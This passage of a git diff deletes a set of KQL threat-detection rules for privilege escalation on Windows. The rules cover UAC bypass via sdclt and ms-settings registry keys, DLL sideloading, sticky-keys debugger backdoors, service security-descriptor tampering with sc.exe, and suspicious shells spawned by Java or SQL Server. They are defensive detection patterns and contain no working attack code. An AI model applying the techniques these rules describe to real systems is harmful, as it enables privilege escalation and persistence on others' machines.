"C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or ((FolderPath contains "C:\\Program Files\\CheckPoint\\" or FolderPath contains "C:\\Program Files (x86)\\CheckPoint\\") and FolderPath endswith "\\PolicyManager.dll" and (InitiatingProcessFolderPath contains "C:\\Program Files\\CheckPoint\\" or InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\CheckPoint\\") and InitiatingProcessFolderPath endswith "\\SmartConsole.exe") or (FolderPath contains ":\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" and (InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" or InitiatingProcessFolderPath contains "C:\\Windows\\System32\\backgroundTaskHost.exe")) or (InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" and InitiatingProcessFolderPath endswith "\\wldp.dll") or (FolderPath contains "C:\\Program Files\\Microsoft\\Exchange Server\\" and FolderPath endswith "\\mswb7.dll") or (FolderPath endswith "C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll" and InitiatingProcessFolderPath endswith "C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe"))))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_UAC_Bypass_Via_Sdclt.EXE.kql b/Privilege Escalation/Potential_UAC_Bypass_Via_Sdclt.EXE.kql
deleted file mode 100644
index cb5229ea..00000000
--- a/Privilege Escalation/Potential_UAC_Bypass_Via_Sdclt.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/05/02
-// Level: medium
-// Description: A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques.
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002
-DeviceProcessEvents
-| where FolderPath endswith "sdclt.exe" and ProcessIntegrityLevel =~ "High"
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_Vivaldi_elf.DLL_Sideloading.kql b/Privilege Escalation/Potential_Vivaldi_elf.DLL_Sideloading.kql
deleted file mode 100644
index da809f2c..00000000
--- a/Privilege Escalation/Potential_Vivaldi_elf.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/08/03
-// Level: medium
-// Description: Detects potential DLL sideloading of "vivaldi_elf.dll"
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\vivaldi_elf.dll" and (not((FolderPath contains "\\Vivaldi\\Application\\" and InitiatingProcessFolderPath endswith "\\Vivaldi\\Application\\vivaldi.exe")))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_WWlib.DLL_Sideloading.kql b/Privilege Escalation/Potential_WWlib.DLL_Sideloading.kql
deleted file mode 100644
index 4753e096..00000000
--- a/Privilege Escalation/Potential_WWlib.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/05/18
-// Level: medium
-// Description: Detects potential DLL sideloading of "wwlib.dll"
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\wwlib.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\" or FolderPath startswith "C:\\Program Files\\Microsoft Office\\") and InitiatingProcessFolderPath endswith "\\winword.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Office\\"))))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_Waveedit.DLL_Sideloading.kql b/Privilege Escalation/Potential_Waveedit.DLL_Sideloading.kql
deleted file mode 100644
index 77fc4544..00000000
--- a/Privilege Escalation/Potential_Waveedit.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/14
-// Level: high
-// Description: Detects potential DLL sideloading of "waveedit.dll", which is part of the Nero WaveEditor audio editing software.
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\waveedit.dll" and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Nero\\Nero Apps\\Nero WaveEditor\\waveedit.exe", "C:\\Program Files\\Nero\\Nero Apps\\Nero WaveEditor\\waveedit.exe")) and (FolderPath startswith "C:\\Program Files (x86)\\Nero\\Nero Apps\\Nero WaveEditor\\" or FolderPath startswith "C:\\Program Files\\Nero\\Nero Apps\\Nero WaveEditor\\"))))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_Wazuh_Security_Platform_DLL_Sideloading.kql b/Privilege Escalation/Potential_Wazuh_Security_Platform_DLL_Sideloading.kql
deleted file mode 100644
index 224f54fb..00000000
--- a/Privilege Escalation/Potential_Wazuh_Security_Platform_DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/03/13
-// Level: medium
-// Description: Detects potential DLL side loading of DLLs that are part of the Wazuh security platform
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\libwazuhshared.dll" or FolderPath endswith "\\libwinpthread-1.dll") and (not((FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Program Files (x86)\\"))) and (not(((FolderPath contains "\\AppData\\Local\\" or FolderPath contains "\\ProgramData\\") and FolderPath endswith "\\mingw64\\bin\\libwinpthread-1.dll")))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_appverifUI.DLL_Sideloading.kql b/Privilege Escalation/Potential_appverifUI.DLL_Sideloading.kql
deleted file mode 100644
index fa40db7c..00000000
--- a/Privilege Escalation/Potential_appverifUI.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/20
-// Level: high
-// Description: Detects potential DLL sideloading of "appverifUI.dll"
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\appverifUI.dll" and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\SysWOW64\\appverif.exe", "C:\\Windows\\System32\\appverif.exe")) and (FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))))
\ No newline at end of file
diff --git a/Privilege Escalation/Potentially_Suspicious_Child_Process_of_KeyScrambler.exe.kql b/Privilege Escalation/Potentially_Suspicious_Child_Process_of_KeyScrambler.exe.kql
deleted file mode 100644
index a30d1353..00000000
--- a/Privilege Escalation/Potentially_Suspicious_Child_Process_of_KeyScrambler.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2024/05/13
-// Level: medium
-// Description: Detects potentially suspicious child processes of KeyScrambler.exe
-// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1203, attack.t1574.002
-DeviceProcessEvents
-| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "cscript.exe", "mshta.exe", "PowerShell.EXE", "pwsh.dll", "regsvr32.exe", "RUNDLL32.EXE", "wscript.exe"))) and InitiatingProcessFolderPath endswith "\\KeyScrambler.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/Potentially_Suspicious_Event_Viewer_Child_Process.kql b/Privilege Escalation/Potentially_Suspicious_Event_Viewer_Child_Process.kql
deleted file mode 100644
index 0897182f..00000000
--- a/Privilege Escalation/Potentially_Suspicious_Event_Viewer_Child_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2017/03/19
-// Level: high
-// Description: Detects uncommon or suspicious child processes of "eventvwr.exe" which might indicate a UAC bypass attempt
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, car.2019-04-001
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\eventvwr.exe" and (not((FolderPath endswith ":\\Windows\\System32\\mmc.exe" or FolderPath endswith ":\\Windows\\System32\\WerFault.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\WerFault.exe")))
\ No newline at end of file
diff --git a/Privilege Escalation/PowerShell_Profile_Modification.kql b/Privilege Escalation/PowerShell_Profile_Modification.kql
deleted file mode 100644
index cfccee4d..00000000
--- a/Privilege Escalation/PowerShell_Profile_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: HieuTT35, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019/10/24
-// Level: medium
-// Description: Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.013
-DeviceFileEvents
-| where FolderPath endswith "\\Microsoft.PowerShell_profile.ps1" or FolderPath endswith "\\PowerShell\\profile.ps1" or FolderPath endswith "\\Program Files\\PowerShell\\7-preview\\profile.ps1" or FolderPath endswith "\\Program Files\\PowerShell\\7\\profile.ps1" or FolderPath endswith "\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" or FolderPath endswith "\\WindowsPowerShell\\profile.ps1"
\ No newline at end of file
diff --git a/Privilege Escalation/Powerup_Write_Hijack_DLL.kql b/Privilege Escalation/Powerup_Write_Hijack_DLL.kql
deleted file mode 100644
index b2cd19b0..00000000
--- a/Privilege Escalation/Powerup_Write_Hijack_DLL.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Subhash Popuri (@pbssubhash)
-// Date: 2021/08/21
-// Level: high
-// Description: Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.
-In it's default mode, it builds a self deleting .bat file which executes malicious command.
-The detection rule relies on creation of the malicious bat file (debug.bat by default).
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.defense_evasion, attack.t1574.001
-DeviceFileEvents
-| where (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and FolderPath endswith ".bat"
\ No newline at end of file
diff --git a/Privilege Escalation/Process_Creation_Using_Sysnative_Folder.kql b/Privilege Escalation/Process_Creation_Using_Sysnative_Folder.kql
deleted file mode 100644
index f767153d..00000000
--- a/Privilege Escalation/Process_Creation_Using_Sysnative_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Max Altgelt (Nextron Systems)
-// Date: 2022/08/23
-// Level: medium
-// Description: Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1055
-DeviceProcessEvents
-| where ProcessCommandLine contains ":\\Windows\\Sysnative\\" or FolderPath contains ":\\Windows\\Sysnative\\"
\ No newline at end of file
diff --git a/Privilege Escalation/Process_Explorer_Driver_Creation_By_Non-Sysinternals_Binary.kql b/Privilege Escalation/Process_Explorer_Driver_Creation_By_Non-Sysinternals_Binary.kql
deleted file mode 100644
index db3f32f1..00000000
--- a/Privilege Escalation/Process_Explorer_Driver_Creation_By_Non-Sysinternals_Binary.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2023/05/05
-// Level: high
-// Description: Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself.
-Hack tools or malware may use the Process Explorer driver to elevate privileges, drops it to disk for a few moments, runs a service using that driver and removes it afterwards.
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1068
-DeviceFileEvents
-| where (FolderPath contains "\\PROCEXP" and FolderPath endswith ".sys") and (not((InitiatingProcessFolderPath endswith "\\procexp.exe" or InitiatingProcessFolderPath endswith "\\procexp64.exe")))
\ No newline at end of file
diff --git a/Privilege Escalation/Process_Monitor_Driver_Creation_By_Non-Sysinternals_Binary.kql b/Privilege Escalation/Process_Monitor_Driver_Creation_By_Non-Sysinternals_Binary.kql
deleted file mode 100644
index c6201772..00000000
--- a/Privilege Escalation/Process_Monitor_Driver_Creation_By_Non-Sysinternals_Binary.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/05
-// Level: medium
-// Description: Detects creation of the Process Monitor driver by processes other than Process Monitor (procmon) itself.
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1068
-DeviceFileEvents
-| where (FolderPath contains "\\procmon" and FolderPath endswith ".sys") and (not((InitiatingProcessFolderPath endswith "\\procmon.exe" or InitiatingProcessFolderPath endswith "\\procmon64.exe")))
\ No newline at end of file
diff --git a/Privilege Escalation/Regedit_as_Trusted_Installer.kql b/Privilege Escalation/Regedit_as_Trusted_Installer.kql
deleted file mode 100644
index a45472ea..00000000
--- a/Privilege Escalation/Regedit_as_Trusted_Installer.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/05/27
-// Level: high
-// Description: Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe
-// Tags: attack.privilege_escalation, attack.t1548
-DeviceProcessEvents
-| where FolderPath endswith "\\regedit.exe" and (InitiatingProcessFolderPath endswith "\\TrustedInstaller.exe" or InitiatingProcessFolderPath endswith "\\ProcessHacker.exe")
\ No newline at end of file
diff --git a/Privilege Escalation/Renamed_Mavinject.EXE_Execution.kql b/Privilege Escalation/Renamed_Mavinject.EXE_Execution.kql
deleted file mode 100644
index e67eb044..00000000
--- a/Privilege Escalation/Renamed_Mavinject.EXE_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Florian Roth
-// Date: 2022/12/05
-// Level: high
-// Description: Detects the execution of a renamed version of the "Mavinject" process. Which can be abused to perform process injection using the "/INJECTRUNNING" flag
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1055.001, attack.t1218.013
-DeviceProcessEvents
-| where (ProcessVersionInfoOriginalFileName in~ ("mavinject32.exe", "mavinject64.exe")) and (not((FolderPath endswith "\\mavinject32.exe" or FolderPath endswith "\\mavinject64.exe")))
\ No newline at end of file
diff --git a/Privilege Escalation/Rundll32_Registered_COM_Objects.kql b/Privilege Escalation/Rundll32_Registered_COM_Objects.kql
deleted file mode 100644
index 314c9c8a..00000000
--- a/Privilege Escalation/Rundll32_Registered_COM_Objects.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/02/13
-// Level: high
-// Description: load malicious registered COM objects
-// Tags: attack.privilege_escalation, attack.persistence, attack.t1546.015
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "-sta " or ProcessCommandLine contains "-localserver ") and (ProcessCommandLine contains "{" and ProcessCommandLine contains "}")) and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/Privilege Escalation/Scheduled_Task_Creation_Via_Schtasks.EXE.kql b/Privilege Escalation/Scheduled_Task_Creation_Via_Schtasks.EXE.kql
deleted file mode 100644
index 0ea2e752..00000000
--- a/Privilege Escalation/Scheduled_Task_Creation_Via_Schtasks.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/01/16
-// Level: low
-// Description: Detects the creation of scheduled tasks by user accounts via the "schtasks" utility.
-// Tags: attack.execution, attack.persistence, attack.privilege_escalation, attack.t1053.005, attack.s0111, car.2013-08-001, stp.1u
-DeviceProcessEvents
-| where (ProcessCommandLine contains " /create " and FolderPath endswith "\\schtasks.exe") and (not((AccountName contains "AUTHORI" or AccountName contains "AUTORI")))
\ No newline at end of file
diff --git a/Privilege Escalation/Sdclt_Child_Processes.kql b/Privilege Escalation/Sdclt_Child_Processes.kql
deleted file mode 100644
index 40ba4dfa..00000000
--- a/Privilege Escalation/Sdclt_Child_Processes.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/05/02
-// Level: medium
-// Description: A General detection for sdclt spawning new processes. This could be an indicator of sdclt being used for bypass UAC techniques.
-// Tags: attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\sdclt.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/Security_Privileges_Enumeration_Via_Whoami.EXE.kql b/Privilege Escalation/Security_Privileges_Enumeration_Via_Whoami.EXE.kql
deleted file mode 100644
index 7cd541b4..00000000
--- a/Privilege Escalation/Security_Privileges_Enumeration_Via_Whoami.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/05/05
-// Level: high
-// Description: Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.
-// Tags: attack.privilege_escalation, attack.discovery, attack.t1033
-DeviceProcessEvents
-| where (ProcessCommandLine contains " /priv" or ProcessCommandLine contains " -priv") and (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe")
\ No newline at end of file
diff --git a/Privilege Escalation/ServiceDll_Hijack.kql b/Privilege Escalation/ServiceDll_Hijack.kql
deleted file mode 100644
index fb9f8be0..00000000
--- a/Privilege Escalation/ServiceDll_Hijack.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2022/02/04
-// Level: medium
-// Description: Detects changes to the "ServiceDLL" value related to a service in the registry.
-This is often used as a method of persistence.
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1543.003
-DeviceRegistryEvents
-| where ((RegistryKey contains "\\System" and RegistryKey contains "ControlSet" and RegistryKey contains "\\Services") and RegistryKey endswith "\\Parameters\\ServiceDll") and (not(((RegistryValueData =~ "%%systemroot%%\\system32\\ntdsa.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\lsass.exe" and RegistryKey endswith "\\Services\\NTDS\\Parameters\\ServiceDll") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe" or RegistryValueData =~ "C:\\Windows\\system32\\spool\\drivers\\x64\\3\\PrintConfig.dll"))) and (not((RegistryValueData =~ "C:\\Windows\\System32\\STAgent.dll" and InitiatingProcessFolderPath endswith "\\regsvr32.exe")))
\ No newline at end of file
diff --git a/Privilege Escalation/Service_DACL_Abuse_To_Hide_Services_Via_Sc.EXE.kql b/Privilege Escalation/Service_DACL_Abuse_To_Hide_Services_Via_Sc.EXE.kql
deleted file mode 100644
index 04c45340..00000000
--- a/Privilege Escalation/Service_DACL_Abuse_To_Hide_Services_Via_Sc.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades)
-// Date: 2021/12/20
-// Level: high
-// Description: Detects usage of the "sc.exe" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574.011
-DeviceProcessEvents
-| where (ProcessCommandLine contains "sdset" and ProcessCommandLine contains "DCLCWPDTSD") and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe")
\ No newline at end of file
diff --git a/Privilege Escalation/Service_Security_Descriptor_Tampering_Via_Sc.EXE.kql b/Privilege Escalation/Service_Security_Descriptor_Tampering_Via_Sc.EXE.kql
deleted file mode 100644
index a2adcfc1..00000000
--- a/Privilege Escalation/Service_Security_Descriptor_Tampering_Via_Sc.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/28
-// Level: medium
-// Description: Detection of sc.exe utility adding a new service with special permission which hides that service.
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574.011
-DeviceProcessEvents
-| where ProcessCommandLine contains "sdset" and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe")
\ No newline at end of file
diff --git a/Privilege Escalation/Shell_Open_Registry_Keys_Manipulation.kql b/Privilege Escalation/Shell_Open_Registry_Keys_Manipulation.kql
deleted file mode 100644
index 3d4deb59..00000000
--- a/Privilege Escalation/Shell_Open_Registry_Keys_Manipulation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, attack.t1546.001
-DeviceRegistryEvents
-| where (RegistryValueData contains "\\Software\\Classes\\{" and ActionType =~ "RegistryValueSet" and RegistryKey endswith "Classes\\ms-settings\\shell\\open\\command\\SymbolicLinkValue") or RegistryKey endswith "Classes\\ms-settings\\shell\\open\\command\\DelegateExecute" or ((ActionType =~ "RegistryValueSet" and (RegistryKey endswith "Classes\\ms-settings\\shell\\open\\command\\(Default)" or RegistryKey endswith "Classes\\exefile\\shell\\open\\command\\(Default)")) and (not(RegistryValueData =~ "(Empty)")))
\ No newline at end of file
diff --git a/Privilege Escalation/Shell_Process_Spawned_by_Java.EXE.kql b/Privilege Escalation/Shell_Process_Spawned_by_Java.EXE.kql
deleted file mode 100644
index 534b99c8..00000000
--- a/Privilege Escalation/Shell_Process_Spawned_by_Java.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades), Nasreddine Bencherchali
-// Date: 2021/12/17
-// Level: medium
-// Description: Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation)
-// Tags: attack.initial_access, attack.persistence, attack.privilege_escalation
-DeviceProcessEvents
-| where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and InitiatingProcessFolderPath endswith "\\java.exe") and (not((ProcessCommandLine contains "build" and InitiatingProcessFolderPath contains "build")))
\ No newline at end of file
diff --git a/Privilege Escalation/Sticky_Key_Like_Backdoor_Execution.kql b/Privilege Escalation/Sticky_Key_Like_Backdoor_Execution.kql
deleted file mode 100644
index 0509bca7..00000000
--- a/Privilege Escalation/Sticky_Key_Like_Backdoor_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community
-// Date: 2018/03/15
-// Level: critical
-// Description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
-// Tags: attack.privilege_escalation, attack.persistence, attack.t1546.008, car.2014-11-003, car.2014-11-008
-DeviceProcessEvents
-| where (ProcessCommandLine contains "sethc.exe" or ProcessCommandLine contains "utilman.exe" or ProcessCommandLine contains "osk.exe" or ProcessCommandLine contains "Magnify.exe" or ProcessCommandLine contains "Narrator.exe" or ProcessCommandLine contains "DisplaySwitch.exe") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wt.exe") and InitiatingProcessFolderPath endswith "\\winlogon.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/Sticky_Key_Like_Backdoor_Usage_-_Registry.kql b/Privilege Escalation/Sticky_Key_Like_Backdoor_Usage_-_Registry.kql
deleted file mode 100644
index 0a1e634c..00000000
--- a/Privilege Escalation/Sticky_Key_Like_Backdoor_Usage_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community
-// Date: 2018/03/15
-// Level: critical
-// Description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
-// Tags: attack.privilege_escalation, attack.persistence, attack.t1546.008, car.2014-11-003, car.2014-11-008
-DeviceRegistryEvents
-| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Magnify.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Narrator.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\DisplaySwitch.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\atbroker.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\HelpPane.exe\\Debugger"
\ No newline at end of file
diff --git a/Privilege Escalation/Suspect_Svchost_Activity.kql b/Privilege Escalation/Suspect_Svchost_Activity.kql
deleted file mode 100644
index 0c14e8e3..00000000
--- a/Privilege Escalation/Suspect_Svchost_Activity.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: David Burkett, @signalblur
-// Date: 2019/12/28
-// Level: high
-// Description: It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1055
-DeviceProcessEvents
-| where (ProcessCommandLine endswith "svchost.exe" and FolderPath endswith "\\svchost.exe") and (not(((InitiatingProcessFolderPath endswith "\\rpcnet.exe" or InitiatingProcessFolderPath endswith "\\rpcnetp.exe") or isnull(ProcessCommandLine))))
\ No newline at end of file
diff --git a/Privilege Escalation/Suspicious_Child_Process_Created_as_System.kql b/Privilege Escalation/Suspicious_Child_Process_Created_as_System.kql
deleted file mode 100644
index d536982c..00000000
--- a/Privilege Escalation/Suspicious_Child_Process_Created_as_System.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research (OTR)
-// Date: 2019/10/26
-// Level: high
-// Description: Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts
-// Tags: attack.privilege_escalation, attack.t1134.002
-DeviceProcessEvents
-| where (ProcessIntegrityLevel =~ "System" and (InitiatingProcessAccountName contains "AUTHORI" or InitiatingProcessAccountName contains "AUTORI") and ((InitiatingProcessAccountName =~ "NETWORK SERVICE" and InitiatingProcessAccountDomain startswith "") or (InitiatingProcessAccountName =~ "LOCAL SERVICE" and InitiatingProcessAccountDomain startswith "")) and (AccountName contains "AUTHORI" or AccountName contains "AUTORI") and ((AccountName =~ "SYSTEM" and AccountDomain startswith "") or (AccountName =~ "Système" and AccountDomain startswith "") or (AccountName =~ "СИСТЕМА" and AccountDomain startswith ""))) and (not((ProcessCommandLine contains "DavSetCookie" and FolderPath endswith "\\rundll32.exe")))
\ No newline at end of file
diff --git a/Privilege Escalation/Suspicious_Child_Process_Of_SQL_Server.kql b/Privilege Escalation/Suspicious_Child_Process_Of_SQL_Server.kql
deleted file mode 100644
index b669d6d5..00000000
--- a/Privilege Escalation/Suspicious_Child_Process_Of_SQL_Server.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: FPT.EagleEye Team, wagga
-// Date: 2020/12/11
-// Level: high
-// Description: Detects suspicious child processes of the SQLServer process. This could indicate potential RCE or SQL Injection.
-// Tags: attack.t1505.003, attack.t1190, attack.initial_access, attack.persistence, attack.privilege_escalation
-DeviceProcessEvents
-| where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\ping.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\tasklist.exe" or FolderPath endswith "\\wsl.exe") and InitiatingProcessFolderPath endswith "\\sqlservr.exe") and (not((ProcessCommandLine startswith "\"C:\\Windows\\system32\\cmd.exe\" " and FolderPath =~ "C:\\Windows\\System32\\cmd.exe" and InitiatingProcessFolderPath endswith "DATEV_DBENGINE\\MSSQL\\Binn\\sqlservr.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft SQL Server\\")))
\ No newline at end of file
